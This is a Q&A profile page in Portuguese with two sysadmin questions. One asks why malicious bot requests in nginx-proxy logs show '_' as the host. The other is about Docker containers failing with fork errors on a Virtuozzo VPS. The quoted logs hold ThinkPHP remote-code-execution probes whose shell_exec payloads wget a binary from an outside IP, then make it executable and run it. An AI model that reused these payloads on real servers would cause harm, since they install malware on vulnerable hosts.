Início / user-573728

void's questions

Martin Hope
void
Asked: 2020-07-06 12:54:21 +0800 CST
  • -1

Estou usando jwilder/nginx-proxy em um servidor, acessível na internet pública. Mas, na verdade, a única parte de contagem deve ser que é nginx.

Regularmente, verifico todos os logs dos meus vários projetos docker. Claro que existem muitos pedidos de bots tentando atingir qualquer vulnerabilidade conhecida...

E há uma coisa que não consigo explicar para mim mesmo: quase todas as solicitações suspeitas não mostram um domínio real, mas apenas um sublinhado como destino. Aqui estão algumas linhas de exemplo:

proxy_1  | nginx.1  | 1.my.RealIP.4 195.54.160.135 - - [12/Jun/2020:14:50:06 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 503 599 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
proxy_1  | nginx.1  | 1.my.RealIP.4 31.28.227.190 - - [12/Jun/2020:14:56:59 +0000] "GET / HTTP/1.0" 503 197 "-" "-"
proxy_1  | nginx.1  | 1.my.RealIP.4 195.54.160.135 - - [12/Jun/2020:15:06:57 +0000] "GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 503 599 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
proxy_1  | nginx.1  | my.realDomain.com 37.120.196.172 - - [05/Jul/2020:20:49:11 +0000] "GET / HTTP/2.0" 200 3372 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"
proxy_1  | nginx.1  | my.realDomain.com 37.120.196.172 - - [05/Jul/2020:20:49:11 +0000] "GET /favicon.ico HTTP/2.0" 404 196 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"
proxy_1  | nginx.1  | _ 76.71.2.171 - - [12/Jun/2020:15:25:46 +0000] "POST /spywall/timeConfig.php HTTP/1.1" 400 157 "-" "XTC"
proxy_1  | nginx.1  | _ 116.99.130.146 - - [12/Jun/2020:15:29:40 +0000] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://51.77.73.39/bins/vciamangement.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp GME.ThinkPHP ; rm -rf thinkphp' HTTP/1.1" 400 157 "-" "Uirusu/2.0"
proxy_1  | nginx.1  | _ 185.158.248.210 - - [12/Jun/2020:15:37:41 +0000] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://167.71.185.210/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1" 400 157 "-" "Uirusu/2.0"
proxy_1  | nginx.1  | _ 185.202.2.147 - - [05/Jul/2020:20:45:34 +0000] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 150 "-" "-"

Então, há pedidos de a) meu IP b) um domínio meu ec) para... sublinhado? O que esse sublinhado indica?

nginx reverse-proxy docker
Martin Hope
void
Asked: 2020-05-21 13:07:01 +0800 CST
  • 1

Recentemente aluguei um VPS como playground privado e para aprendizagem do docker. Eu quero hospedar alguns webservices por trás do nginx-proxy junto com docker-letsencrypt-nginx-proxy-companion .

Configurar

O servidor executa o Ubuntu 18.04.4 LTS, Docker versão 19.03.6 , build 369ce74a3c, docker-compose versão 1.17.1 , build desconhecido.

4GB vRAM, 4vCores (O hardware é executado no Intel Xeon)

O problema

Assim que quero executar mais de 8 contêineres, recebo erros estranhos. Existem alguns erros diferentes, e não posso dizer especificamente quando qual deles aparece:

  • OCI runtime create failedpor exemplo, ao tentar iniciar o joomla como compose-project com mysql:
ERROR: for joomla_joomladb_1  Cannot start service joomladb: OCI runtime create failed:
unable to retrieve OCI runtime error (open /run/containerd/io.containerd.runtime.v1.linux/moby/741c[...]6e3/log.json:
no such file or directory): fork/exec /usr/sbin/runc: resource temporarily unavailable: unknown
  • socket reset
ERROR: for joomla_joomladb_1  Cannot start service joomladb: read unix @->@/containerd-shim/24f42b8[...]32fa1.sock:
read: connection reset by peer: unknown
  • pthread_create failed: Resource temporarily unavailableNão tenho nenhum registro correspondente no momento. Vou postá-los aqui se o erro ocorrer mais uma vez. Mas uma linha sempre parece serparent id not found
  • garfo falhou. Quando este erro aparece, não posso fazer mais nada. Veja o próximo ponto:

Além disso e em relação a isso, às vezes recebo alguns erros estranhos no meu shell ao digitar qualquer comando. Quando o servidor está nesse estado, não posso su para fazer root ou reinicializar por linha de comando. Você pode me ver tentando digitar sudoesta imagem: Erros com qualquer comando. Mesmo desligar ou reiniciar

O que eu tentei

  • Eu vi este relatório no Github e alguns outros e se referem a um limite máximo de tarefas na máquina. Eu já configurei isso para um volume mais alto, infinitymas tudo isso não parece ajudar. (Eu mudei uma vez, /etc/systemd/system.confbem como por systemctl edit docker.service).
$ systemctl show --property=DefaultTasksMax
 DefaultTasksMax=4659
$ systemctl status docker
...
  Tasks: 52
...

  • Instalei exatamente o mesmo sistema no meu laptop (exceto o software de virtualização - o VPS roda em Virtuozzo, localmente usei Quemu com virt-manager) - e tudo funciona como esperado!

  • Os problemas aparecem com qualquer container que tento iniciar. hello-world, um outro projeto de composição ou um projeto já construído...

  • Entrei em contato com meu provedor de hospedagem, também o referido problema acima e disse que eles não limitariam nenhum uso.

virtualization vps docker-compose fork virtuozzo